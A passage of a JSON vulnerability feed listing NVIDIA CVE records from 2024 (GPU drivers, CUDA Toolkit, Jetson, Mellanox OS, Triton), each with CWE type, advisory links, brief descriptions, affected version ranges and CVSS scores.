"LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-08-08T18:15Z", "lastModifiedDate" : "2024-12-26T19:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0105", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-274" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5562", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5562", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ConnectX Firmware contains a vulnerability where an attacker may cause an improper handling of insufficient privileges issue. A successful exploit of this vulnerability may lead to denial of service, data tampering, and limited information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-01T06:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0106", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-274" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5562", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5562", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ConnectX Host Firmware for the BlueField Data Processing Unit (DPU) contains a vulnerability where an attacker may cause an improper handling of insufficient privileges issue. A successful exploit of this vulnerability may lead to denial of service, data tampering, and limited information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-01T06:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0107", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5557", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5557", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "475.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "556.12", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "475.14", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "538.78", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "552.74", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.12", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-08-08T17:15Z", "lastModifiedDate" : "2024-09-17T12:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0108", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-755" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5555", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5555", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Jetson Linux contains a vulnerability in NvGPU where error handling paths in GPU MMU mapping code fail to clean up a failed mapping attempt. A successful exploit of this vulnerability may lead to denial of service, code execution, and escalation of privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:*", "versionEndExcluding" : "32.7.5", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier_16gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier_32gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier_64gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier_8gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_agx_xavier_industrial:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_nano:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_nano:-:*:-:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_nano:-:*:developer_kit:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_nano_2gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx1_l4t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx2_4gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx2_nx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_tx2i:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_xavier_nx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_xavier_nx:-:*:developer_kit:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_xavier_nx:-:*:production:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:jetson_xavier_nx_16gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.0, "impactScore" : 6.0 } }, "publishedDate" : "2024-08-08T17:15Z", "lastModifiedDate" : "2024-09-16T19:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0109", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit contains a vulnerability in command `cuobjdump` where a user may cause a crash by passing in a malformed ELF file. A successful exploit of this vulnerability may cause an out of bounds read in the unprivileged process memory which could lead to a limited denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cuda_toolkit:*:*:*:*:*:*:*:*", "versionEndIncluding" : "12.6.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "LOW", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-08-31T09:15Z", "lastModifiedDate" : "2024-09-18T15:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0110", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit contains a vulnerability in command `cuobjdump` where a user may cause an out-of-bound write by passing in a malformed ELF file. A successful exploit of this vulnerability may lead to code execution or denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cuda_toolkit:*:*:*:*:*:*:*:*", "versionEndIncluding" : "12.6.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-08-31T09:15Z", "lastModifiedDate" : "2024-09-18T15:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0111", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-1284" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5564", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit contains a vulnerability in command 'cuobjdump' where a user may cause a crash or produce incorrect output by passing a malformed ELF file. A successful exploit of this vulnerability may lead to a limited denial of service or data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cuda_toolkit:*:*:*:*:*:*:*:*", "versionEndIncluding" : "12.6.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 4.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 2.5 } }, "publishedDate" : "2024-08-31T09:15Z", "lastModifiedDate" : "2024-09-18T15:22Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0112", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-20" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5611", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5611", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Jetson AGX Orin™ and NVIDIA IGX Orin software contain a vulnerability where an attacker can cause an improper input validation issue by escalating certain permissions to a limited degree. A successful exploit of this vulnerability might lead to code execution, denial of service, data corruption, information disclosure, or escalation of privilege." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-12T00:15Z", "lastModifiedDate" : "2025-02-12T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0113", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5563", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5563", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Mellanox OS, ONYX, Skyway, and MetroX-3 XCC contain a vulnerability in the web support, where an attacker can cause a CGI path traversal by a specially crafted URI. A successful exploit of this vulnerability might lead to escalation of privileges and information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.12.1002", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "3.10.4500", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:lts:*:*:*", "versionStartIncluding" : "3.11.0000", "versionEndExcluding" : "3.11.2302", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:onyx:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "3.10.4504", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-gw:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "8.1.4500", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-gw:*:*:*:*:-:*:*:*", "versionEndExcluding" : "8.2.2300", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mga100-hs2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:nvda-os_xc:*:*:*:*:*:*:*:*", "versionEndExcluding" : "18.2.2200", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mtq8400-hs2r:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.12.1002", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8100-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8200-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-08-12T13:38Z", "lastModifiedDate" : "2024-12-26T19:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0114", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-1244" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5561", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5561", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Hopper HGX for 8-GPU contains a vulnerability in the HGX Management Controller (HMC) that may allow a malicious actor with administrative access on the BMC to access the HMC as an administrator. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-05T02:15Z", "lastModifiedDate" : "2025-03-05T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0115", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5560", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5560", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CV-CUDA for Ubuntu 20.04, Ubuntu 22.04, and Jetpack contains a vulnerability in Python APIs where a user may cause an uncontrolled resource consumption issue by a long running CV-CUDA Python process. A successful exploit of this vulnerability may lead to denial of service and data loss." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.1.0:prealpha:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.2.0:alpha:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.2.1:alpha:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.3.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.3.1:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.4.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.5.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.6.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.7.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.8.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cv-cuda:0.9.0:beta:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:jetpack_software_development_kit:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:22.04:*:*:*:lts:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "HIGH", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 4.2 } }, "publishedDate" : "2024-08-12T13:38Z", "lastModifiedDate" : "2024-12-26T19:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0116", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5565", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5565", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server contains a vulnerability where a user may cause an out-of-bounds read issue by releasing a shared memory region while it is in use. A successful exploit of this vulnerability may lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-01T05:15Z", "lastModifiedDate" : "2024-10-04T13:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0117", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2012", "name" : "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2012", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0118", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5586", "refsource" : "", 